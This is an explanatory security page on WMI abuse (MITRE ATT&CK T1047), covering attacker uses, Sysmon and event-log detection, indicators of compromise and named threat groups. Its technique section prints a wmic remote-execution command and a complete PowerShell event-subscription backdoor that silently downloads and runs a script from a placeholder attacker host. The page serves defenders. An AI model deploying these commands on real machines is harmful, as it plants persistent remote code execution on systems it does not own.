Windows Management Instrumentation

Information

• Name: Windows Management Instrumentation

• ID: T1047

• Tactics: TA0002

Introduction

Windows Management Instrumentation (WMI) is a built-in Microsoft Windows management technology used by administrators for system monitoring, management, and configuration. In the MITRE ATT&CK framework, adversaries leverage WMI as a powerful technique (T1047) for lateral movement, persistence, privilege escalation, and remote code execution. Attackers exploit WMI due to its legitimate usage in enterprise environments, making malicious activities harder to detect and distinguish from normal administrative tasks.

Deep Dive Into Technique

WMI is a core Windows component that provides a standardized interface for accessing system information and performing administrative tasks remotely or locally. It operates via the Common Information Model (CIM), allowing scripts and applications to query and manipulate system resources.

Technical Execution Methods and Mechanisms:

• Remote Command Execution:

  • Attackers utilize WMI's remote capabilities to execute commands or scripts on remote systems via wmic.exe or PowerShell cmdlets.

  • Example command for remote command execution:

    Copy

    wmic /node:<target_machine> process call create "cmd.exe /c malicious_script.bat"

• Persistence via WMI Event Subscriptions:

  • Attackers create persistent backdoors using WMI event subscriptions, which trigger malicious scripts or executables upon specific system events.

  • WMI event subscriptions consist of three components:

    1. Event Filter: Defines the event condition to trigger the subscription.

    2. Event Consumer: Specifies the action to execute (e.g., script execution).

    3. Filter-to-Consumer Binding: Links the event filter and consumer.

  • Example of malicious WMI event subscription creation via PowerShell:

    Copy

    $filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments @{Name='MaliciousFilter'; EventNamespace='root/cimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"}
    $consumer = Set-WmiInstance -Namespace root/subscription -Class CommandLineEventConsumer -Arguments @{Name='MaliciousConsumer'; CommandLineTemplate='powershell.exe -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://malicious.domain/payload.ps1'')"' }
    Set-WmiInstance -Namespace root/subscription -Class __FilterToConsumerBinding -Arguments @{Filter=$filter; Consumer=$consumer}

• Privilege Escalation:

  • Attackers exploit WMI to escalate privileges by invoking processes or scripts under contexts with higher privileges.

• Reconnaissance and Information Gathering:

  • WMI queries allow attackers to enumerate system details, installed software, running services, and user accounts.

When this Technique is Usually Used

Attackers commonly employ WMI at various stages of the cyber kill chain, including:

• Execution Stage:

  • Remotely running malicious scripts or executables on compromised hosts.

• Persistence Stage:

  • Creating persistent backdoors via WMI event subscriptions, allowing attackers to maintain access after system reboots.

• Privilege Escalation Stage:

  • Leveraging WMI to execute processes or scripts under elevated privileges.

• Lateral Movement Stage:

  • Utilizing remote WMI execution to propagate malware or move laterally across the network.

• Reconnaissance Stage:

  • Gathering detailed system information, installed software, and network configurations.

How this Technique is Usually Detected

Detection of malicious WMI activities involves monitoring, logging, and analyzing system events and behaviors. Detection methods include:

• Event Log Monitoring:

  • Monitor Windows Event Logs for suspicious WMI-related events:

    • Event ID 5857 (WMI-Activity/Operational): Indicates WMI provider execution.

    • Event ID 5861 (WMI-Activity/Operational): Indicates errors or unusual WMI provider activity.

• Sysmon Monitoring:

  • Utilize Sysinternals Sysmon to log WMI event subscriptions:

    • Event ID 19: WmiEventFilter activity.

    • Event ID 20: WmiEventConsumer activity.

    • Event ID 21: WmiEventConsumerToFilter activity.

• Behavioral Anomaly Detection:

  • Detect unusual WMI queries or remote WMI executions that deviate from normal administrative patterns.

  • Correlate WMI activities with other suspicious indicators, such as abnormal network connections or process creations.

• Endpoint Detection and Response (EDR) Tools:

  • Deploy EDR solutions capable of detecting and alerting on suspicious WMI usage patterns, execution of scripts, and remote process creation.

Indicators of Compromise (IoCs):

• Presence of suspicious WMI event subscriptions (unusual event filters or consumers).

• Execution of unusual or obfuscated PowerShell commands via WMI.

• Unusual network traffic initiated from WMI-related processes (wmiprvse.exe).

• Abnormal execution of wmic.exe or PowerShell scripts invoking WMI classes.

Why it is Important to Detect This Technique

Timely detection of malicious WMI activities is crucial due to the significant potential impacts on systems and networks, including:

• Persistence and Long-Term Access:

  • Attackers can maintain stealthy persistence through WMI event subscriptions, making remediation challenging.

• Privilege Escalation:

  • Exploiting WMI for privilege escalation can provide attackers with administrative privileges, leading to broader system compromise.

• Lateral Movement:

  • Leveraging WMI for lateral movement allows attackers to propagate malware across multiple systems rapidly.

• Data Exfiltration and System Compromise:

  • Attackers can utilize WMI to execute malicious payloads, enabling data theft, ransomware deployment, or complete system control.

• Stealth and Evasion:

  • Malicious WMI usage blends with legitimate administrative activities, complicating detection and response.

Early detection enables security teams to:

• Quickly contain and remediate incidents, minimizing damage.

• Prevent attackers from establishing long-term footholds in the environment.

• Reduce risk of data breaches, financial losses, and reputational damage.

Examples

Real-world examples of attacks leveraging WMI include:

• APT29 (Cozy Bear):

  • Utilized WMI event subscriptions for persistence and remote command execution.

  • Created WMI event subscriptions triggering malicious PowerShell payloads to maintain stealthy persistence.

• FIN7 Cybercrime Group:

  • Employed WMI for lateral movement and remote command execution across compromised networks.

  • Leveraged WMI to execute PowerShell scripts downloading additional malware payloads.

• TrickBot Malware:

  • Utilized WMI commands to enumerate system information and facilitate lateral movement.

  • Executed reconnaissance commands via WMI to identify valuable targets within compromised networks.

• NotPetya Ransomware:

  • Leveraged WMI alongside other lateral movement techniques (such as SMB) to propagate ransomware rapidly across networks.

Tools and Techniques Used in Real-world Scenarios:

• PowerShell Empire Framework:

  • Provides built-in modules for creating WMI event subscriptions and executing remote commands via WMI.

• Metasploit Framework:

  • Includes modules leveraging WMI for remote command execution and persistence.

• Cobalt Strike:

  • Implements WMI-based lateral movement and persistence mechanisms for red team operations.

Impacts Observed in Real-world Attacks:

• Persistent compromise and stealthy backdoors.

• Rapid lateral movement and propagation of ransomware or malware.

• Privilege escalation leading to full network compromise.

• Extensive data exfiltration and sensitive information theft.

• Operational disruption and significant financial losses to targeted organizations.